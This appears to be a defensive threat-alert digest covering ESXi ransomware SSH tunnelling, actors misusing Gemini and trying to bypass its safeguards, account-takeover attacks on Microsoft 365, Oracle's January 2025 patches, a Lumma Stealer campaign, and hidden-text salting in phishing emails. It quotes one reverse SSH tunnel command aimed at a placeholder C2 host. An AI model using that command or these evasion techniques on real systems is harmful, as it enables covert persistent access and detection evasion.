Threat Alerts

Researchers have identified that cybercriminals behind ESXi ransomware campaigns are specifically targeting virtualized environments by utilizing SSH tunneling to bypass security defenses. These attackers adopt ‘living-off-the-land’ techniques, leveraging native utilities such as SSH to create a SOCKS tunnel between their C2 servers and the compromised system. By doing so, they seamlessly integrate with normal network traffic, ensuring persistence while evading security measures.

ESXi appliances, often overlooked in security monitoring, serve as both an entry point and a pivot for ransomware operators. These adversaries either gain access through stolen administrative credentials or exploit known vulnerabilities to bypass authentication. Once inside, they establish an SSH tunnel using built-in functionality or other common tools with similar capabilities. A simple SSH command, such as ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>, enables remote port forwarding to their C2 infrastructure. Since ESXi systems are typically stable and rarely undergo unexpected shutdowns, these tunnels act as semi-persistent backdoors, allowing attackers to maintain long-term access to compromised networks.

Government-backed hackers and cybercriminals worldwide are increasingly using Google’s Gemini AI to enhance their cyber-espionage and criminal activities. Instead of inventing new methods, these adversaries employ AI to improve and hasten their established techniques. Advanced persistent threat groups from Iran, along with operatives from China and North Korea, are using Gemini for tasks ranging from content creation for phishing campaigns to building out sophisticated cyber-infrastructure. Russian hackers are similarly engaging with Gemini to refine their programming tools, all while persistently trying to bypass AI safety measures meant to block such misuse.
Despite the alarming threat landscape, generative AI in cyber warfare primarily accelerates and extends existing attack methods without introducing fundamentally new techniques. This issue extends beyond Gemini, affecting other AI systems as well, and emphasizes a proactive approach to cybersecurity in an era where AI is becoming an increasingly powerful tool in the hands of cyber attackers.

Attackers are increasingly leveraging HTTP client tools to execute account takeover (ATO) attacks, particularly targeting cloud environments like Microsoft 365. These tools, originally designed for legitimate HTTP request handling, are now being exploited for brute force attacks, adversary-in-the-middle (AitM) techniques, and credential theft. The rise in ATO attempts, observed across numerous organizations, highlights the evolving nature of these attacks, with threat actors constantly adapting their methods to bypass security measures, including multifactor authentication (MFA).

Recent campaigns have shown how different HTTP clients are used to facilitate credential theft and unauthorized access. Attackers often begin by harvesting credentials through phishing or data breaches, followed by automated brute force attacks using widely available HTTP tools. Some campaigns incorporate AitM techniques, enabling attackers to intercept MFA tokens and gain persistent access. Once an account is compromised, threat actors establish persistence by modifying mailbox rules, exfiltrating sensitive data, and even deploying OAuth applications to maintain long-term control over the environment.

These evolving attack strategies demonstrate the adaptability of cybercriminals, who shift between different HTTP clients to optimize their success rates and evade detection. The use of new tools and techniques reflects a broader trend of ongoing refinement in ATO methodologies.

Oracle’s January 2025 Critical Patch Update (CPU) addresses 318 newly identified security vulnerabilities across its product range, emphasizing the urgency of patching due to several high-severity issues that pose significant risks if exploited.

One of the most critical vulnerabilities is CVE-2025-21556 in the Oracle Agile Product Lifecycle Management (PLM) Framework, carrying a near-maximum CVSS score of 9.9. This severe flaw allows low-privileged attackers with simple HTTP network access to gain control of affected systems, making it exceptionally dangerous.

The update also mitigates CVE-2024-21287, a high-risk vulnerability with a CVSS score of 7.5 that has already been exploited in version 9.3.6 of the Oracle Agile PLM Framework, further strengthening its security defenses.

Additionally, the CPU resolves multiple critical vulnerabilities, including CVE-2025-21524, CVE-2023-3961, CVE-2024-23807, CVE-2023-46604, CVE-2024-45492, CVE-2024-56337, and CVE-2025-21535, all with CVSS scores of 9.8. These flaws span various products, including JD Edwards, Oracle Agile Engineering, Oracle Communications, and the WebLogic Server, some of which have already been exploited in cyberattacks.

Furthermore, CVE-2024-37371, a critical Kerberos 5 vulnerability in Oracle Communications Billing and Revenue Management with a CVSS score of 9.1, has been addressed. This flaw could lead to memory corruption due to improperly sized message tokens, further underscoring the necessity for prompt patching.

A recent campaign deploying Lumma Stealer demonstrates an innovative infection chain targeting victims across various geographic regions and industry sectors. Threat actors employ a combination of fake CAPTCHA prompts and malvertising to deliver the malware while evading detection.

The infection chain begins with malvertising, embedding malicious advertisements within legitimate ad networks. These ads redirect users to websites featuring fake CAPTCHA verification prompts. Interacting with these prompts triggers the download of a ZIP archive containing the malicious payload. This ZIP file includes a loader script that installs Lumma Stealer, initiating the data exfiltration process. By leveraging these techniques, attackers disguise malicious activity as legitimate user interaction, effectively evading detection. Once deployed, Lumma Stealer extracts credentials, financial data, and system details, which are exfiltrated to the attackers’ command-and-control (C2) infrastructure.

The use of social engineering through fake CAPTCHAs, combined with malvertising for broad distribution, represents a multifaceted strategy. This approach enables the malware to bypass detection while achieving a high infection success rate.

Hidden text salting, also known as “poisoning,” is a technique increasingly employed by threat actors to evade email parsers, spam filters, and detection systems. This method involves embedding characters or elements within the HTML or CSS of emails that are invisible to recipients but interfere with detection engines relying on keyword recognition or brand extraction. Security researchers have observed a significant rise in the use of this method in phishing campaigns, showcasing its adaptability and impact in bypassing modern email security measures.

Researchers found that hidden text salting leverages CSS properties and invisible characters to obscure critical components of phishing emails. Common techniques include using CSS properties like “display: inline-block” with a zero width or hiding text with the “overflow: hidden property”, making the inserted content invisible to the victim while confusing keyword detection systems. Threat actors also employ zero-width characters between letters of brand names, ensuring email parsers misinterpret these strings without affecting their visual presentation. These techniques effectively bypass detection engines that rely on visible text for analysis.

In addition, hidden text salting is used to disrupt language detection modules and obfuscate malicious payloads. For example, phishing emails that appear to be in English can include visually hidden foreign language strings to manipulate spam filters’ language detection algorithms. Similarly, HTML smuggling techniques involve inserting irrelevant comments into base64-encoded data within attachments, making it difficult for parsers to reconstruct and decode malicious payloads.